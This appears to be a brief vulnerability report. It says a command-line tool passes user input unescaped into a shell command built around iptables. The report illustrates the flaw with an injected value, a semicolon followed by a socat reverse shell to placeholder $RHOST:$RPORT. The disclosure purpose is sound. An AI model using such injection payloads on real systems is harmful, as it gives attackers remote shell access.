it looks like this CLI has some hardcoded shell commands with variable substitutions that look possibly unprotected against command injection.
For example
iptables %s > %s 2>&1
could probably be executed as iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane > /var/IptablesInfo 2>&1
by issuing iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
and therefore it might be possible to get real shell access too.